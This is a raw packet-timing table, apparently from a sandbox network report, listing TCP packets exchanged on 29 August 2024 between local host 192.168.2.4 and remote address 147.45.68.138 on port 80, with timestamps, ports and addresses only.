                                                      Aug 29, 2024 22:52:27.824316025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.824338913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.824364901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.824884892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.824897051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.824908018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.824924946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.824949026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.824949026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825150013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825172901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825184107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825189114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825206995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825227976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825292110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825328112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825395107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825406075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825422049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825432062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825448036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825455904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825455904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825469971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825476885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825479984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825493097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825503111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825525045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825536966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825546980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825575113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825623989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825639009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825651884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825676918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825676918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825683117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825694084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825697899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825704098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825717926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825742960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825768948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825778008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825809956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825851917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825875044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825884104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825891018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825895071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825907946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.825915098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.825938940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.826194048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.826217890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.826227903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.826236010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.826261044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.826270103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.826281071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.826301098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.826301098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.826330900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827016115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827028036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827039003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827063084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827074051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827074051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827094078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827116966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827117920 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827131033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827157021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827164888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827208042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827219009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827229977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827248096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827255011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827255964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827267885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827275038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827279091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827301979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827302933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827302933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827320099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827325106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827334881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827344894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827349901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827358961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827372074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827374935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827387094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827397108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827398062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827408075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827409983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827430964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827445030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827455997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827464104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827464104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827466965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827478886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827497005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827516079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.827533007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827543974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.827572107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828002930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828015089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828026056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828035116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828043938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828068018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828236103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828247070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828255892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828277111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828289986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828356981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828368902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828378916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828392982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828402042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828407049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828413963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.828425884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828438044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.828454971 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909265041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909332037 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909338951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909349918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909358025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909368038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909372091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909378052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909394979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909398079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909409046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909424067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909430981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909456015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909600973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909636021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909637928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909650087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909672976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909676075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909679890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909717083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909749985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909759998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909787893 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909859896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909869909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909878969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909888029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909902096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909921885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909935951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909977913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.909986973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.909998894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910017967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910023928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910028934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910032034 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910041094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910053968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910063028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910080910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910531044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910566092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910576105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910577059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910598040 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910608053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910617113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910624981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910640001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910655022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910665989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910665989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910691023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910705090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910844088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910855055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910864115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910878897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910880089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910886049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910904884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910912991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.910953999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.910990953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911025047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911035061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911043882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911065102 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911078930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911088943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911088943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911088943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911098957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911109924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911118031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911133051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911165953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911189079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911202908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911212921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911231995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911231995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911233902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911246061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911247015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911254883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911264896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911267996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911277056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911278009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911289930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.911294937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911303043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911322117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.911326885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912086010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912096024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912103891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912130117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912147045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912199974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912220955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912230968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912236929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912240028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912251949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912254095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912262917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912283897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912318945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912329912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912352085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912354946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912377119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912389994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912410021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912456036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912497044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912508011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912519932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912528992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912529945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912538052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912556887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912626028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912636042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912650108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912662983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912666082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912676096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912692070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912692070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912708998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912708998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912719965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.912731886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.912756920 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.913065910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.913108110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.913113117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.913120031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.913139105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.913156986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.913278103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.913286924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.913295031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.913305044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.913331985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.913341999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.914625883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914678097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.914680958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914691925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914731026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.914747953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.914829016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914838076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914848089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914856911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914864063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.914871931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914874077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.914904118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.914958000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914967060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.914998055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915059090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915069103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915098906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915110111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915117979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915127039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915138006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915139914 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915159941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915190935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915218115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915231943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915241003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915250063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915256977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915257931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915266037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915275097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915281057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915308952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915316105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915323973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915328979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915352106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915359020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915363073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915373087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915390015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915405989 CEST4973980192.168.2.4147.45.68.138
